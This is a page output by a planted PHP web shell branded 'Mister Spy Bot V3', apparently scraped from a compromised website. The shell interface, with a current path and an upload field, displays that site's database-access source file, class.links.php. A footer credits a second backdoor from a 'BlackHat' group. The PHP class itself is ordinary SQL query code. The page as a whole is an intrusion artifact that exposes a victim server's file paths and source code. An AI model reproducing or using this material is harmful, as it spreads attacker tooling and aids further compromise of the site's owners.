Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.links.php

<?php 

require_once('class.dbaccess.php');
require_once('class.link.php');
require_once('class.filter.php');
require_once('class.page.php');
require_once('class.estados.php');

class Links extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		if ((isset($filter['Titulo'])) && ($filter['Titulo'] != ''))
			$sql.= " AND l.Titulo LIKE '%" . DB::StringUnquoted($filter['Titulo']) . "%'";
		
		if ((isset($filter['IdCategoria'])) && ($filter['IdCategoria'] != ''))
			$sql.= " AND l.IdCategoria = " . DB::Number($filter['IdCategoria']);
		
		return $sql;
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT l.*";
		$sql.= " FROM tblLinksInteres l";
		$sql.= " LEFT JOIN tblCategorias c ON l.IdCategoria = c.IdCategoria";
		$sql.= " WHERE l.IdEstado = " . DB::Number(Estados::Activo);
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " ORDER BY c.Nombre, l.Titulo ASC";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oLink = new Link();
			$oLink->ParseFromArray($oRow);
			
			array_push($arr, $oLink);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}
	

	public function GetById($IdLink)
	{
		$sql = "SELECT l.*";
		$sql.= " FROM tblLinksInteres l";
		$sql.= " WHERE IdLink = " . DB::Number($IdLink);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oLink = new Link();
		$oLink->ParseFromArray($oRow);
		
		return $oLink;		
	}
	
	
	public function GetAllByCategoria(Categoria $oCategoria)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblLinksInteres l";
		$sql.= " WHERE l.IdEstado = " . DB::Number(Estados::Activo);
		$sql.= " AND IdCategoria = " . DB::Number($oCategoria->IdCategoria);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oLink = new Link();
			$oLink->ParseFromArray($oRow);
			
			array_push($arr, $oLink);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}	
	
	
	public function GetLastByCategoria(Categoria $oCategoria, $Cantidad)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblLinksInteres";
		$sql.= " WHERE IdEstado = " . DB::Number(Estados::Activo);
		$sql.= " AND IdCategoria = " . DB::Number($oCategoria->IdCategoria);	
		$sql.= " ORDER BY Titulo ASC";
		$sql.= " LIMIT " . DB::Number($Cantidad);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oLink = new Link();
			$oLink->ParseFromArray($oRow);
			
			array_push($arr, $oLink);
			
			$oRes->MoveNext();
		}	
			
		return $arr;
	}
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT l.*";
		$sql.= " FROM tblLinksInteres l";
		$sql.= " WHERE l.IdEstado = " . DB::Number(Estados::Activo);
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	

	public function Create(Link $oLink)
	{
		$arr = array
		(
			'IdCategoria'	=> DB::Number($oLink->IdCategoria),
			'Titulo' 		=> DB::String($oLink->Titulo),
			'Link' 			=> DB::String($oLink->Link),
			'Descripcion' 	=> DB::String($oLink->Descripcion),
			'Imagen'		=> DB::String($oLink->Imagen),
			'IdEstado'		=> DB::Number(Estados::Activo)
		);
		
		if (!$this->Insert('tblLinksInteres', $arr))
			return false;
			
		return $oLink;
	}
	
	
	public function Update(Link $oLink)
	{
		$where = " IdLink = " . DB::Number($oLink->IdLink);
		
		$arr = array
		(
			'IdCategoria'	=> DB::Number($oLink->IdCategoria),
			'Titulo' 		=> DB::String($oLink->Titulo),
			'Link' 			=> DB::String($oLink->Link),
			'Descripcion' 	=> DB::String($oLink->Descripcion),
			'Imagen'		=> DB::String($oLink->Imagen),
			'IdEstado'		=> DB::Number($oLink->IdEstado)
		);
		
		if (!DBAccess::UpdateEntidad('tblLinksInteres', $arr, $where))
			return false;
		
		return $oLink;
	}
	

	public function Delete($IdLink)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdLink = " . DB::Number($IdLink);

		$arr = array('IdEstado'	=> DB::Number(Estados::Eliminado));

		if (!DBAccess::UpdateEntidad('tblLinksInteres', $arr, $where))
		{
			DBAccess::$db->Rollback();	
			return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat